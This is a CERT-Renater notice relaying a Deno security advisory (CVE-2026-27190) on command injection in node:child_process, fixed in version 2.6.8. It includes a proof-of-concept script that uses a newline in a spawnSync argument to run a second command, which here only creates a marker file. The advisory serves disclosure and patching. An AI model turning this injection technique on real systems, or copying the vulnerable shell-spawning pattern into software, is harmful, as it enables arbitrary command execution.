Ce mail provient de l'extérieur, restons vigilants

=====================================================================

                            CERT-Renater

                Note d'Information No. 2026/VULN199
_____________________________________________________________________

DATE                : 20/02/2026

HARDWARE PLATFORM(S): /

OPERATING SYSTEM(S): Systems running deno versions prior to 2.6.8.

=====================================================================
https://github.com/denoland/deno/security/advisories/GHSA-hmh4-3xvx-q5hr
_____________________________________________________________________


Command Injection via Incomplete shell metacharacter blocklist in
`node:child_process`

High
bartlomieju published GHSA-hmh4-3xvx-q5hr Feb 19, 2026

Package
deno

Affected versions
2.6.7

Patched versions
2.6.8


Description

Summary

A command injection vulnerability exists in Deno's node:child_process
implementation.


Reproduction

import { spawnSync } from "node:child_process";
import * as fs from "node:fs";

// Cleanup
try { fs.unlinkSync('/tmp/rce_proof'); } catch {}

// Create legitimate script
fs.writeFileSync('/tmp/legitimate.ts', 'console.log("normal");');

// Malicious input with newline injection
const maliciousInput = `/tmp/legitimate.ts\ntouch /tmp/rce_proof`;

// Vulnerable pattern
spawnSync(Deno.execPath(), ['run', '--allow-all', maliciousInput], {
  shell: true,
  encoding: 'utf-8'
});

// Verify
console.log('Exploit worked:', fs.existsSync('/tmp/rce_proof'));

Run: deno run --allow-all poc.mjs

The file /tmp/rce_proof is created, confirming arbitrary command
execution.


Mitigation

All users need to update to the patched version (Deno v2.6.8).


Severity
High
8.1/ 10

CVSS v3 base metrics
Attack vector
Network
Attack complexity
High
Privileges required
None
User interaction
None
Scope
Unchanged
Confidentiality
High
Integrity
High
Availability
High
CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H

CVE ID
CVE-2026-27190

Weaknesses
Weakness CWE-78

Credits

    @jackhax jackhax Reporter


=========================================================
+ CERT-RENATER        |    tel : 01-53-94-20-44         +
+ 23/25 Rue Daviel    |    fax : 01-53-94-20-41         +
+ 75013 Paris         |   email:cert@support.renater.fr +
=========================================================